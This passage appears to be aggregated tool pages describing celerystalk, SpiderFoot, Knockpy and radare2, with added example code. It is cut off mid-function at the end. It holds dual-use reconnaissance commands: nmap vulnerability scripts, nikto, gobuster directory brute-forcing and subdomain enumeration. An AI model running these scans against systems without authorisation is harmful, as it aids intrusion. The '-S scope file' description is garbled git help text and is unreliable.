Configure which tools you'd like celerystalk to execute: the install script drops a config.ini file in the celerystalk folder. The config.ini file is broken up into three sections:

Service Mapping - The first section normalizes Nmap & Nessus service names for celerystalk (this idea was created by @codingo_ in Reconnoitre AFAIK).
    [nmap-service-names]
    http = http,http-alt,http-proxy,www,http?
    https = ssl/http,https,ssl/http-alt,ssl/http?
    ftp = ftp,ftp?
    mysql = mysql
    dns = dns,domain,domain

Domain Recon Tools - The second section defines the tools you'd like to use for subdomain discovery (an optional feature):
    [domain-recon]
    amass : /opt/amass/amass -d [DOMAIN]
    sublist3r : python /opt/Sublist3r/sublist3r.py -d [DOMAIN]

Service Configuration - The rest of the config.ini sections define which commands you want celerystalk to run for each identified service (i.e., http, https, ssh).
Disable any command by commenting it out with a ; or a #. Add your own commands using the [TARGET], [PORT], and [OUTPUT] placeholders. Here is an example:
    [http]
    whatweb : whatweb http://[TARGET]:[PORT] -a3 --colour=never > [OUTPUT].txt
    cewl : cewl http://[TARGET]:[PORT]/ -m 6 -w [OUTPUT].txt
    curl_robots : curl http://[TARGET]:[PORT]/robots.txt --user-agent 'Googlebot/2.1 (+http://www.google.com/bot.html)' --connect-timeout 30 --max-time 180 > [OUTPUT].txt
    nmap_http_vuln : nmap -sC -sV -Pn -v -p [PORT] --script=http-vuln* [TARGET] -d -oN [OUTPUT].txt -oX [OUTPUT].xml --host-timeout 120m --script-timeout 20m
    nikto : nikto -h http://[TARGET] -p [PORT] &> [OUTPUT].txt
    gobuster-common : gobuster -u http://[TARGET]:[PORT]/ -k -w /usr/share/seclists/Discovery/Web-Content/common.txt -s '200,204,301,302,307,403,500' -e -n -q > [OUTPUT].txt
    photon : python /opt/Photon/photon.py -u http://[TARGET]:[PORT] -o [OUTPUT]
    ;gobuster_2.3-medium : gobuster -u http://[TARGET]:[PORT]/ -k -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -s '200,204,301,307,403,500' -e -n -q > [OUTPUT].txt

Run Nmap or Nessus:
Nmap: Run nmap against your target(s). Required: enable version detection (-sV) and output to XML (-oX filename.xml). All other nmap options are up to you. Here are some examples:
    nmap target(s) -Pn -p- -sV -oX filename.xml
    nmap -iL target_list.txt -Pn -sV -oX filename.xml
Nessus: Run Nessus against your target(s) and export the results as a .nessus file.

Create workspace:
    no options   Prints current workspace
    create       Creates new workspace
    -w           Define new workspace name
    -o           Define output directory assigned to workspace
Create default workspace:     ./celerystalk workspace create -o /assessments/client
Create named workspace:       ./celerystalk workspace create -o /assessments/client -w client
Switch to another workspace:  ./celerystalk workspace client

Import Data: Import data into celerystalk.
    -f scan.xml          Nmap/Nessus xml. Adds all IP addresses from this file to the hosts table and marks them all in scope to be scanned. Adds all ports and service types to the services table.
    -S scope.txt         Scope file. Show file differences that haven't been staged.
    -D subdomains.txt    (sub)Domains file. celerystalk determines whether each subdomain is in scope by resolving the IP and looking for the IP in the DB. If there is a match, the domain is marked as in scope and will be scanned.
Import Nmap XML file:        ./celerystalk import -f /assessments/nmap.xml
Import Nessus file:          ./celerystalk import -f /assessments/scan.nessus
Import list of Domains:      ./celerystalk import -D <file>
Import list of IPs/Ranges:   ./celerystalk import -S <file>
Specify workspace:           ./celerystalk import -f <file>
Import multiple files:       ./celerystalk import -f nmap.xml -S scope.txt -D domains.txt

Find Subdomains (Optional): celerystalk will perform subdomain recon using the tools specified in the config.ini.
    -d domain1,domain2,etc   Run Amass, Sublist3r, etc. and store domains in DB. After running your subdomain recon tools celerystalk determines whether each subdomain is in scope by resolving the IP and looking for the IP in the DB. If there is a match, the domain is marked as in scope and will be scanned.
Find subdomains:  celerystalk subdomains -d domain1.com,domain2.com

Launch Scan: I recommend using the import command first and running scan with no options; however, you do have the option to do it all at once (import and scan) by using the flags below. celerystalk will submit tasks to celery, which asynchronously executes them and logs output to your output directory.
    no options           Scan all in scope hosts. Reads the DB and scans every in scope IP and subdomain. Launches all enabled tools for IPs, but only http/https specific tools against virtualhosts.
    -t ip,vhost,cidr     Scan specific target(s) from the DB or scan file. Scan a subset of the in scope IPs and/or subdomains.
    -s                   Simulation. Sends all of the tasks to celery, but all commands are executed with a # before them, rendering them inert.
Use these only if you want to skip the import phase and import/scan all at once:
    -f scan.xml          Import and process Nmap/Nessus xml before scan. Adds all IP addresses from this file to the hosts table and marks them all in scope to be scanned. Adds all ports and service types to the services table.
    -S scope.txt         Import and process scope file before scan. Show file differences that haven't been staged.
    -D subdomains.txt    Import and process (sub)domains file before scan. celerystalk determines whether each subdomain is in scope by resolving the IP and looking for the IP in the DB. If there is a match, the domain is marked as in scope and will be scanned.
    -d domain1,domain2,etc   Find subdomains and scan in scope hosts. After running your subdomain recon tools celerystalk determines whether each subdomain is in scope by resolving the IP and looking for the IP in the DB. If there is a match, the domain is marked as in scope and will be scanned.

Scan imported hosts/subdomains
Scan all in scope hosts:    ./celerystalk scan
Scan subset of DB hosts:    ./celerystalk scan -t 10.0.0.1,10.0.0.3
                            ./celerystalk scan -t 10.0.0.100-200
                            ./celerystalk scan -t 10.0.0.0/24
                            ./celerystalk scan -t sub.domain.com
Simulation mode:            ./celerystalk scan -s

Import and Scan
Start from Nmap XML file:   ./celerystalk scan -f /pentest/nmap.xml -o /pentest
Start from Nessus file:     ./celerystalk scan -f /pentest/scan.nessus -o /pentest
Scan all in scope vhosts:   ./celerystalk scan -f <file> -o /pentest -d domain1.com,domain2.com
Scan subset hosts in XML:   ./celerystalk scan -f <file> -o /pentest -t 10.0.0.1,10.0.0.3
                            ./celerystalk scan -f <file> -o /pentest -t 10.0.0.100-200
                            ./celerystalk scan -f <file> -o /pentest -t 10.0.0.0/24
Simulation mode:            ./celerystalk scan -f <file> -o /pentest -s

Rescan: Use this command to rescan an already scanned host.
    no option            For each in scope host in the DB, celerystalk will ask if you want to rescan it
    -t ip,vhost,cidr     Scan a subset of the in scope IPs and/or subdomains.
Rescan all hosts:    ./celerystalk rescan
Rescan some hosts:   ./celerystalk rescan -t 1.2.3.4,sub.domain.com
Simulation mode:     ./celerystalk rescan -s

Query Status: Asynchronously check the status of the task queue as frequently as you like. The watch mode actually executes the Linux watch command so you don't fill up your entire terminal buffer.
    no options   Shows all tasks in the default workspace
    watch        Sends the command to the unix watch command, which will let you get an updated status every 2 seconds
    brief        Limit of 5 results per status (pending/running/completed/cancelled/paused)
    summary      Shows only a banner with numbers and not the tasks themselves
Query Tasks:
    ./celerystalk query
    ./celerystalk query watch
    ./celerystalk query brief
    ./celerystalk query summary
    ./celerystalk query summary watch

Cancel/Pause/Resume Tasks: Cancel/Pause/Resume any task(s) that are currently running or in the queue.
Option Description cancel Canceling a running task will send a kill -TERMCanceling a queued task* will make celery ignore it (uses celery’s revoke).Canceling all tasks* will kill running tasks and revoke all queued tasks. pause Pausing a single task uses kill -STOP to suspend the process.Pausing all tasks* attemps to kill -STOP all running tasks, but it is a little wonky and you mind need to run it a few times. It is possible a job completed before it was able to be paused, which means you will have a worker that is still accepting new jobs. resume Resuming tasks* sends a kill -CONT which allows the process to start up again where it left off. Cancel/Pause/Resume Tasks: ./celerystalk <verb> 5,6,10-20 #Cancel/Pause/Resume tasks 5, 6, and 10-20 from current workspace ./celerystalk <verb> all #Cancel/Pause/Resume all tasks from current workspaces Run Report: Run a report which combines all of the tool output into an html file and a txt file. Run this as often as you like. Each time you run the report it overwrites the previous report. 
Create Report:
  ./celerystalk report   # Create a report for all scanned hosts in the current workspace

Screenshot:

Access the DB: List the workspaces, hosts, services, or paths stored in the celerystalk database.

Option        Description
workspaces    Show all known workspaces and the output directory associated with each workspace
services      Show all known open ports and service types by IP
hosts         Show all hosts (IP addresses and subdomains/vhosts), whether they are in scope and whether they have been submitted for scanning
paths         Show all paths that have been identified, by vhost
-w workspace  Specify a non-default workspace

Show workspaces:
  ./celerystalk db workspaces
Show services:
  ./celerystalk db services
Show hosts:
  ./celerystalk db hosts
Show paths:
  ./celerystalk db paths

Export DB: Export each table of the DB to a csv file.

Option        Description
no options    Export the services, hosts, and paths tables from the default database
-w workspace  Specify a non-default workspace

Export current DB:
  ./celerystalk db export
Export another DB:
  ./celerystalk db export -w test

Usage

Usage:
  celerystalk workspace create -o <output_dir> [-w workspace_name]
  celerystalk workspace [<workspace_name>]
  celerystalk import [-f <nmap_file>] [-S scope_file] [-D subdomains_file] [-u <url>]
  celerystalk subdomains -d <domains> [-s]
  celerystalk scan [-f <nmap_file>] [-t <targets>] [-d <domains>] [-S scope_file] [-D subdomains_file] [-s]
  celerystalk scan -u <url> [-s]
  celerystalk rescan [-t <targets>] [-s]
  celerystalk query ([full] | [summary] | [brief]) [watch]
  celerystalk query [watch] ([full] | [summary] | [brief])
  celerystalk report
  celerystalk cancel ([all]|[<task_ids>])
  celerystalk pause ([all]|[<task_ids>])
  celerystalk resume ([all]|[<task_ids>])
  celerystalk db ([workspaces] | [services] | [hosts] | [vhosts] | [paths])
  celerystalk db export
  celerystalk shutdown
  celerystalk interactive
  celerystalk (help | -h | --help)

Options:
  -h --help             Show this screen
  -v --version          Show version
  -f <nmap_file>        Nmap xml import file
  -o <output_dir>       Output directory
  -S <scope_file>       Scope import file
  -D <subdomains_file>  Subdomains import file
  -t <targets>          Target(s): IP, IP Range, CIDR
  -u <url>              URL to parse and scan with all configured tools
  -w <workspace>        Workspace
  -d --domains          Domains to scan for vhosts
  -s --simulation       Simulation mode. Submit tasks, comment out all commands

Examples:

Workspace
  Create default workspace      celerystalk workspace create -o /assessments/client
  Create named workspace        celerystalk workspace create -o /assessments/client -w client
  Switch to another workspace   celerystalk workspace client2

Import
  Import Nmap XML file:         celerystalk import -f /assessments/nmap.xml
  Import Nessus file:           celerystalk import -f /assessments/scan.nessus
  Import list of Domains:       celerystalk import -D <file>
  Import list of IPs/Ranges:    celerystalk import -S <file>
  Import multiple files:        celerystalk import -f nmap.xml -S scope.txt -D domains.txt

Subdomain Recon
  Find subdomains:              celerystalk subdomains -d domain1.com,domain2.com

Scan
  Scan all in scope hosts:      celerystalk scan
  Scan subset of DB hosts:      celerystalk scan -t 10.0.0.1,10.0.0.3
                                celerystalk scan -t 10.0.0.100-200
                                celerystalk scan -t 10.0.0.0/24
                                celerystalk scan -t sub.domain.com
  Simulation mode:              celerystalk scan -s

Import and Scan
  Start from Nmap XML file:     celerystalk scan -f /pentest/nmap.xml
  Start from Nessus file:       celerystalk scan -f /pentest/scan.nessus
  Scan subset hosts in XML:     celerystalk scan -f <file> -t 10.0.0.1,10.0.0.3
                                celerystalk scan -f <file> -t 10.0.0.100-200
                                celerystalk scan -f <file> -t 10.0.0.0/24
                                celerystalk scan -f <file> -t sub.domain.com
  Simulation mode:              celerystalk scan -f <file> -s

Rescan
  Rescan all hosts:             celerystalk rescan
  Rescan some hosts:            celerystalk rescan -t 1.2.3.4,sub.domain.com
  Simulation mode:              celerystalk rescan -s

Query Mode
  All tasks:                    celerystalk query
  Update status every 2s:       celerystalk query watch
  Show only 5 tasks per mode:   celerystalk query brief
  Show stats only:              celerystalk query summary
  Show stats every 2s:          celerystalk query summary watch

Job Control (cancel/pause/resume)
  Specific tasks:               celerystalk cancel 5,6,10-20
                                celerystalk pause 5,6,10-20
                                celerystalk resume 5,6,10-20
  All tasks, current workspace: celerystalk cancel all
                                celerystalk pause all
                                celerystalk resume all

Access the DB
  Show workspaces:              celerystalk db workspaces
  Show services:                celerystalk db services
  Show hosts:                   celerystalk db hosts
  Show vhosts only:             celerystalk db vhosts
  Show paths:                   celerystalk db paths

Export DB
  Export current DB:            celerystalk db export

Credit

This project was inspired by many great tools:
  https://github.com/codingo/Reconnoitre by @codingo_
  https://github.com/frizb/Vanquish by @frizb
  https://github.com/leebaird/discover by @discoverscripts
  https://github.com/1N3/Sn1per
  https://github.com/SrFlipFlop/Network-Security-Analysis by @SrFlipFlop

Thanks to @offensivesecurity and @hackthebox_eu for their lab networks.

Also, thanks to:
  @decidedlygray for pointing me towards celery, helping me solve python problems that were over my head, and for the extensive beta testing
  @kerpanic for inspiring me to dust off an old project and turn it into celerystalk
  My TUV OpenSky team and my IthacaSec hackers for testing this out and submitting bugs and features

Download Celerystalk
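The cancel/pause/resume table above explains celerystalk's job control in terms of plain Unix signals: kill -STOP to pause, kill -CONT to resume, kill -TERM to cancel a running task. The following is an added example, not celerystalk's own code, that drives a child process through exactly those three transitions and confirms each one through waitpid() instead of assuming it worked, which is the check you want given the README's warning that "pause all" can miss a job. It assumes a POSIX system with the coreutils sleep command available as a stand-in for a long-running scanner task.

```python
import os
import signal
import subprocess
import time


def drive_job(cmd):
    """Spawn `cmd` as a child process and walk it through the three signals
    celerystalk's job control uses: SIGSTOP (pause), SIGCONT (resume) and
    SIGTERM (cancel). Each transition is confirmed via waitpid() so a caller
    never reports a task as paused or cancelled when it is not.
    Returns the list of states observed, in order."""
    observed = []
    child = subprocess.Popen(cmd, stdout=subprocess.DEVNULL,
                             stderr=subprocess.DEVNULL)
    pid = child.pid
    time.sleep(0.1)  # give the child a moment to exec

    # pause: SIGSTOP cannot be caught or ignored, so the stop is immediate
    os.kill(pid, signal.SIGSTOP)
    _, status = os.waitpid(pid, os.WUNTRACED)   # returns once the child is stopped
    if os.WIFSTOPPED(status) and os.WSTOPSIG(status) == signal.SIGSTOP:
        observed.append("stopped")

    # resume: SIGCONT restarts the process exactly where it was suspended
    os.kill(pid, signal.SIGCONT)
    _, status = os.waitpid(pid, os.WCONTINUED)  # returns once the child resumes
    if os.WIFCONTINUED(status):
        observed.append("continued")

    # cancel: SIGTERM is catchable, so a tool may trap it and keep running;
    # inspect how the child actually ended instead of assuming it died
    os.kill(pid, signal.SIGTERM)
    _, status = os.waitpid(pid, 0)
    if os.WIFSIGNALED(status) and os.WTERMSIG(status) == signal.SIGTERM:
        observed.append("terminated")
        child.returncode = -signal.SIGTERM   # reaped above; keep Popen consistent
    elif os.WIFEXITED(status):
        observed.append("exited:%d" % os.WEXITSTATUS(status))
        child.returncode = os.WEXITSTATUS(status)
    return observed


if __name__ == "__main__":
    # a 30 s sleep stands in for a long-running scan task
    print(drive_job(["sleep", "30"]))
```

If a task wraps its real work in a shell or a process group, the signal only reaches the process you address; a tool that wants "pause all" to be reliable sends the signal to the whole process group (negative pid to os.killpg) rather than to the worker's direct child, which is the kind of gap the README's "a little wonky" remark points at.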
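The Options table says -t accepts "IP, IP Range, CIDR" and the examples show three spellings of a target set (10.0.0.1,10.0.0.3, 10.0.0.100-200, 10.0.0.0/24, plus a bare vhost), while cancel/pause/resume take task ids as 5,6,10-20. The block below is an added example, not celerystalk's own parser, that expands both forms into concrete lists. It assumes the range form is nmap-style, i.e. only the last octet ranges (10.0.0.100-200 means .100 through .200); full-address ranges are not handled.

```python
import ipaddress


def _last_octet_range(item):
    """Expand 'a.b.c.X-Y' into a.b.c.X .. a.b.c.Y (assumed nmap-style range)."""
    base, last = item.rsplit("-", 1)
    prefix, first = base.rsplit(".", 1)
    lo, hi = int(first), int(last)
    if not (0 <= lo <= hi <= 255):
        raise ValueError("bad last-octet range: %s" % item)
    ipaddress.ip_address("%s.%d" % (prefix, lo))  # validates the a.b.c prefix
    return ["%s.%d" % (prefix, n) for n in range(lo, hi + 1)]


def expand_targets(spec):
    """Expand a comma-separated -t value (IP, last-octet range, CIDR or a
    vhost/subdomain name) into an ordered, de-duplicated list of hosts."""
    seen, hosts = set(), []
    for item in (s.strip() for s in spec.split(",")):
        if not item:
            continue
        if "/" in item:
            # CIDR: usable hosts only (network and broadcast excluded)
            net = ipaddress.ip_network(item, strict=False)
            expanded = [str(a) for a in net.hosts()]
        elif "-" in item and item.replace(".", "").replace("-", "").isdigit():
            expanded = _last_octet_range(item)
        else:
            try:
                expanded = [str(ipaddress.ip_address(item))]
            except ValueError:
                expanded = [item.lower()]  # not an address: treat as a vhost
        for host in expanded:
            if host not in seen:
                seen.add(host)
                hosts.append(host)
    return hosts


def expand_task_ids(spec):
    """Expand the cancel/pause/resume form '5,6,10-20' into sorted task ids."""
    ids = set()
    for item in (s.strip() for s in spec.split(",")):
        if not item:
            continue
        if "-" in item:
            lo, hi = (int(x) for x in item.split("-", 1))
            if lo > hi:
                raise ValueError("bad task range: %s" % item)
            ids.update(range(lo, hi + 1))
        else:
            ids.add(int(item))
    return sorted(ids)


if __name__ == "__main__":
    print(expand_targets("10.0.0.1,10.0.0.3,sub.domain.com"))
    print(len(expand_targets("10.0.0.0/24")), "hosts in 10.0.0.0/24")
    print(expand_task_ids("5,6,10-20"))
```

Expanding the spec up front, before any task is queued, is what lets a tool answer "how many hosts will this submit?" in simulation mode (-s) without running anything.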

Link: http://feedproxy.google.com/~r/PentestTools/~3/9zxM11uFyz8/celerystalk-asynchronous-enumeration.html

SpiderFoot – The Most Complete OSINT Collection And Reconnaissance Tool

SpiderFoot is an open source intelligence (OSINT) automation tool. Its goal is to automate the process of gathering intelligence about a given target, which may be an IP address, domain name, hostname, network subnet, ASN or person's name.

SpiderFoot can be used offensively, i.e. as part of a black-box penetration test to gather information about the target, or defensively, to identify what information your organisation is freely providing for attackers to use against you.

What is SpiderFoot?
SpiderFoot is a reconnaissance tool that automatically queries over 100 public data sources (OSINT) to gather intelligence on IP addresses, domain names, e-mail addresses, names and more. You simply specify the target you want to investigate, pick which modules to enable, and SpiderFoot will collect data to build up an understanding of all the entities and how they relate to each other.

What is OSINT?
OSINT (Open Source Intelligence) is data available in the public domain which might reveal interesting information about your target. This includes DNS, Whois, web pages, passive DNS, spam blacklists, file metadata and threat intelligence lists, as well as services like SHODAN, HaveIBeenPwned and more. See the full list of data sources SpiderFoot utilises.

What can I do with SpiderFoot?
The data returned from a SpiderFoot scan will reveal a lot of information about your target, providing insight into possible data leaks, vulnerabilities or other sensitive information that can be leveraged during a penetration test, red team exercise or for threat intelligence. Try it out against your own network to see what you might have exposed!

Read more at the project website: http://www.spiderfoot.net

Download Spiderfoot

Link: http://www.kitploit.com/2018/12/spiderfoot-most-complete-osint.html

Knock v.4.1.1 – Subdomain Scan

Knockpy is a python tool designed to enumerate subdomains on a target domain through a wordlist. It is designed to scan for DNS zone transfer and to try to bypass the wildcard DNS record automatically if it is enabled. Knockpy now supports queries to VirusTotal subdomains; you can set the API_KEY within the config.json file.

Very simply
$ knockpy domain.com

Export full report in JSON
If you want to save a full log like this one, just type:
$ knockpy domain.com --json

Install

Prerequisites
Python 2.7.6

Dependencies
Dnspython
$ sudo apt-get install python-dnspython

Installing
$ git clone https://github.com/guelfoweb/knock.git
$ cd knock
$ nano knockpy/config.json <- set your virustotal API_KEY
$ sudo python setup.py install

Note that it's recommended to use Google DNS: 8.8.8.8 and 8.8.4.4

Knockpy arguments
$ knockpy -h
usage: knockpy [-h] [-v] [-w WORDLIST] [-r] [-c] [-j] domain

___________________________________________

knock subdomain scan
knockpy v.4.1
Author: Gianni 'guelfoweb' Amato
Github: https://github.com/guelfoweb/knock

___________________________________________

positional arguments:
  domain           target to scan, like domain.com

optional arguments:
  -h, --help       show this help message and exit
  -v, --version    show program's version number and exit
  -w WORDLIST      specific path to wordlist file
  -r, --resolve    resolve ip or domain name
  -c, --csv        save output in csv
  -f, --csvfields  add fields name to the first row of csv output file
  -j, --json       export full report in JSON

example:
  knockpy domain.com
  knockpy domain.com -w wordlist.txt
  knockpy -r domain.com or IP
  knockpy -c domain.com
  knockpy -j domain.com

For virustotal subdomains support you can set your API_KEY in the config.json file.
Example

Subdomain scan with internal wordlist
$ knockpy domain.com

Subdomain scan with external wordlist
$ knockpy domain.com -w wordlist.txt

Resolve domain name and get response headers
$ knockpy -r domain.com [or IP]

+ checking for virustotal subdomains: YES
[
  "partnerissuetracker.corp.google.com",
  "issuetracker.google.com",
  "r5---sn-ogueln7k.c.pack.google.com",
  "cse.google.com",
  .......too long.......
  "612.talkgadget.google.com",
  "765.talkgadget.google.com",
  "973.talkgadget.google.com"
]
+ checking for wildcard: NO
+ checking for zonetransfer: NO
+ resolving target: YES
{
  "zonetransfer": {
    "enabled": false,
    "list": []
  },
  "target": "google.com",
  "hostname": "google.com",
  "virustotal": [
    "partnerissuetracker.corp.google.com",
    "issuetracker.google.com",
    "r5---sn-ogueln7k.c.pack.google.com",
    "cse.google.com",
    "mt0.google.com",
    "earth.google.com",
    "clients1.google.com",
    "pki.google.com",
    "www.sites.google.com",
    "appengine.google.com",
    "fcmatch.google.com",
    "dl.google.com",
    "translate.google.com",
    "feedproxy.google.com",
    "hangouts.google.com",
    "news.google.com",
    .......too long.......
    "100.talkgadget.google.com",
    "services.google.com",
    "301.talkgadget.google.com",
    "857.talkgadget.google.com",
    "600.talkgadget.google.com",
    "992.talkgadget.google.com",
    "93.talkgadget.google.com",
    "storage.cloud.google.com",
    "863.talkgadget.google.com",
    "maps.google.com",
    "661.talkgadget.google.com",
    "325.talkgadget.google.com",
    "sites.google.com",
    "feedburner.google.com",
    "support.google.com",
    "code.google.com",
    "562.talkgadget.google.com",
    "190.talkgadget.google.com",
    "58.talkgadget.google.com",
    "612.talkgadget.google.com",
    "765.talkgadget.google.com",
    "973.talkgadget.google.com"
  ],
  "alias": [],
  "wildcard": {
    "detected": {},
    "test_target": "eqskochdzapjbt.google.com",
    "enabled": false,
    "http_response": {}
  },
  "ipaddress": [
    "216.58.205.142"
  ],
  "response_time": "0.0351989269257",
  "http_response": {
    "status": {
      "reason": "Found",
      "code": 302
    },
    "http_headers": {
      "content-length": "256",
      "location": "http://www.google.it/?gfe_rd=cr&ei=60WIWdmnDILCXoKbgfgK",
      "cache-control": "private",
      "date": "Mon, 07 Aug 2017 10:50:19 GMT",
      "referrer-policy": "no-referrer",
      "content-type": "text/html; charset=UTF-8"
    }
  }
}

Save scan output in CSV
$ knockpy -c domain.com

Export full report in JSON
$ knockpy -j domain.com

Talk about
Ethical Hacking and Penetration Testing Guide Book by Rafay Baloch.

Knockpy comes pre-installed on the following security distributions for penetration test:
  BackBox Linux
  PentestBox for Windows
  Buscador Investigative Operating System

Other
This tool is currently maintained by Gianni 'guelfoweb' Amato, who can be contacted at guelfoweb@gmail.com or twitter @guelfoweb. Suggestions and criticism are welcome.

Download Knock
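The report above shows the wildcard check knockpy performs before brute-forcing: it resolves a random label that cannot legitimately exist ("test_target": "eqskochdzapjbt.google.com") and records whether anything answers. The block below is an added example, not knockpy's own code, of that detect-then-filter logic written with an injectable resolver so it runs offline. The zone table, names and addresses are constructed for the example; system_resolve uses the standard library resolver for real lookups (IPv4 only, which is a limitation of socket.gethostbyname_ex).

```python
import random
import socket
import string


def random_label(length=14):
    """A random hostname label, like the test_target knockpy prints."""
    return "".join(random.choice(string.ascii_lowercase) for _ in range(length))


def system_resolve(hostname):
    """Resolve with the OS resolver; [] means NXDOMAIN/no answer."""
    try:
        return socket.gethostbyname_ex(hostname)[2]
    except socket.gaierror:
        return []


def detect_wildcard(domain, resolve, attempts=3):
    """Resolve a few random, non-existent labels under `domain`. Returns the
    set of IPs a wildcard record answers with (empty set = no wildcard).
    Several probes are used because a wildcard may round-robin over IPs."""
    wildcard_ips = set()
    for _ in range(attempts):
        wildcard_ips.update(resolve("%s.%s" % (random_label(), domain)))
    return wildcard_ips


def enumerate_subdomains(domain, wordlist, resolve):
    """Brute-force labels from `wordlist`, dropping hits that only resolve
    because of a wildcard (their answer is a subset of the wildcard's IPs).
    Returns (wildcard_ips, {hostname: [ip, ...]})."""
    wildcard_ips = detect_wildcard(domain, resolve)
    found = {}
    for word in wordlist:
        host = "%s.%s" % (word, domain)
        ips = set(resolve(host))
        if not ips:
            continue
        if wildcard_ips and ips <= wildcard_ips:
            continue  # wildcard bypass: nothing beyond what *.domain returns
        found[host] = sorted(ips)
    return wildcard_ips, found


# --- constructed fake zone so the example runs without network access ---
WILDCARD_IP = "198.51.100.5"
FAKE_ZONE = {
    "www.example.test": ["192.0.2.10"],
    "mail.example.test": ["192.0.2.20"],
    "dev.example.test": [WILDCARD_IP],   # real host sharing the wildcard IP
}


def fake_resolve(hostname):
    """Stand-in resolver: explicit records first, then *.example.test."""
    if hostname in FAKE_ZONE:
        return FAKE_ZONE[hostname]
    if hostname.endswith(".example.test"):
        return [WILDCARD_IP]
    return []


if __name__ == "__main__":
    print(enumerate_subdomains("example.test",
                               ["www", "mail", "dev", "nothere"], fake_resolve))
```

The caveat the constructed zone makes visible: dev.example.test is a genuine host that lives on the same address as the wildcard, and IP-based filtering discards it. That is why knockpy also records an http_response for the wildcard probe; comparing the HTTP answer (status, headers, body hash) of a candidate against the wildcard's gives a second discriminator when the addresses alone cannot tell them apart.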

Link: http://www.kitploit.com/2018/12/knock-v411-subdomain-scan.html

Radare2 – Unix-Like Reverse Engineering Framework And Commandline Tools Security

r2 is a rewrite from scratch of radare in order to provide a set of libraries and tools to work with binary files.

The Radare project started as a forensics tool, a scriptable command-line hexadecimal editor able to open disk files, but later added support for analyzing binaries, disassembling code, debugging programs, attaching to remote gdb servers and more.

radare2 is portable.

Architectures
i386, x86-64, ARM, MIPS, PowerPC, SPARC, RISC-V, SH, m68k, AVR, XAP, System Z, XCore, CR16, HPPA, ARC, Blackfin, Z80, H8/300, V810, V850, CRIS, PIC, LM32, 8051, 6502, i4004, i8080, Propeller, Tricore, Chip8, LH5801, T8200, GameBoy, SNES, MSP430, Xtensa, NIOS II, Dalvik, WebAssembly, MSIL, EBC, TMS320 (c54x, c55x, c55+, c66), Hexagon, Brainfuck, Malbolge, DCPU16.

File Formats
ELF, Mach-O, Fatmach-O, PE, PE+, MZ, COFF, OMF, TE, XBE, BIOS/UEFI, Dyldcache, DEX, ART, CGC, Java class, Android boot image, Plan9 executable, ZIMG, MBN/SBL bootloader, ELF coredump, MDMP (Windows minidump), WASM (WebAssembly binary), Commodore VICE emulator, Game Boy (Advance), Nintendo DS ROMs and Nintendo 3DS FIRMs, various filesystems.

Operating Systems
Windows (since XP), GNU/Linux, OS X, [Net|Free|Open]BSD, Android, iOS, QNX, Solaris, Haiku, FirefoxOS.

Bindings
Vala/Genie, Python (2, 3), NodeJS, Lua, Go, Perl, Guile, PHP, Newlisp, Ruby, Java, OCaml and more.

Dependencies
radare2 can be built without any special dependency; just get a working toolchain (gcc, clang, tcc...) and use make.

Optionally you can use libewf for loading EnCase disk images.

To build the bindings you need the latest valabind, g++ and swig2.

Install
The easiest way to install radare2 from git is by running the following command:
$ sys/install.sh

If you want to install radare2 in the home directory without using root privileges and sudo, simply run:
$ sys/user.sh

Building with meson + ninja
If you don't already have meson and ninja, you can install them with your distribution package manager or with r2pm:
$ r2pm -i meson

If you already have them installed, you can run this line to compile radare2:
$ python ./sys/meson.py --prefix=/usr --shared --install

This method is mostly useful on Windows, because the initial build with the Makefile is not suitable there. If you are lost in any way, just type:
$ python ./sys/meson.py --help

Update
To update Radare2 system-wide, you don't need to uninstall or pull. Just re-run:
$ sys/install.sh

If you installed Radare2 in the home directory, just re-run:
$ sys/user.sh

Uninstall
In case of a polluted filesystem, you can uninstall the current version or remove all previous installations:
$ make uninstall
$ make purge

To remove everything including libraries, use:
$ make system-purge

Package manager
Radare2 has its own package manager, r2pm. Its package repository is on GitHub too. To start using it for the first time, you need to initialize the packages:
$ r2pm init

Refresh the package database before installing any package:
$ r2pm update

To install a package, use the following command:
$ r2pm install [package name]

Bindings
All language bindings are under the r2-bindings directory. You will need to install swig and valabind in order to build the bindings for Python, Lua, etc. APIs are defined in vapi files, which are then translated to swig interfaces, nodejs-ffi or other and then compiled.

The easiest way to install the python bindings is to run:
$ r2pm install lang-python2 #lang-python3 for python3 bindings
$ r2pm install r2api-python
$ r2pm install r2pipe-py

In addition there are the r2pipe bindings, an API for interacting with the prompt: you pass commands and receive the output as a string. Many commands support JSON output, so it integrates easily with many languages, which deserialize it into native objects.
$ npm install r2pipe   # NodeJS
$ gem install r2pipe   # Ruby
$ pip install r2pipe   # Python
$ opam install radare2 # OCaml

And also for Go, Rust, Swift, D, .NET, Java, NewLisp, Perl, Haskell, Vala, OCaml, and many more to come!

Regression Testsuite
Running make tests will fetch the radare2-regressions repository and run all the tests in order to verify that no changes break any functionality.

We run those tests on every commit, and they are also executed with ASAN and valgrind on different platforms to catch other unwanted 'features'.

Documentation
There is no formal documentation of r2 yet. Not all commands are compatible with radare1, so the best way to learn how to do things in r2 is by reading the examples from the web and appending '?' to every command you are interested in.

Commands are small mnemonics of a few characters, and there is some extra syntax sugar that makes the shell much more pleasant for scripting and interacting with the APIs.

You could also check out the radare2 book.

Webserver
radare2 comes with an embedded webserver which serves a pure html/js interface that sends ajax queries to the core and aims to implement a usable UI for phones, tablets and desktops.
$ r2 -c=H /bin/ls

To use the webserver on Windows, you require a cmd instance with administrator rights. To start the webserver, use the following command in the project root:
> radare2.exe -c=H rax2.exe

Pointers
Website: https://www.radare.org/
IRC: irc.freenode.net #radare
Telegram: https://t.me/radare
Matrix: @radare2:matrix.org
Twitter: @radareorg

Download Radare2
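The r2pipe paragraph above describes the pattern in one sentence: send a command, get a string back, or send the j-suffixed variant and get JSON you deserialize into native objects. Here is an added example (not part of the radare2 project) of that pattern in Python: open a binary with r2pipe, run the aaa analysis pass, then turn the function list from aflj into a compact table. analyze_binary needs r2pipe and a radare2 install and returns None when they are absent; summarize_functions is pure and works on the constructed SAMPLE_AFLJ below. The field names used (offset, name, size, nbbs) are the ones aflj emits in the r2 versions I have used, and are assumed rather than taken from this page.

```python
import json


def summarize_functions(aflj):
    """Reduce the list aflj returns (one dict per function) to a table of
    name, start address, size and basic-block count, largest function first.
    Only the 'name', 'offset', 'size' and 'nbbs' keys are read."""
    rows = []
    for fn in aflj:
        rows.append({
            "name": fn["name"],
            "addr": "0x%08x" % fn["offset"],
            "size": fn.get("size", 0),
            "blocks": fn.get("nbbs", 0),
        })
    rows.sort(key=lambda r: (-r["size"], r["name"]))
    return rows


def analyze_binary(path, r2_open=None):
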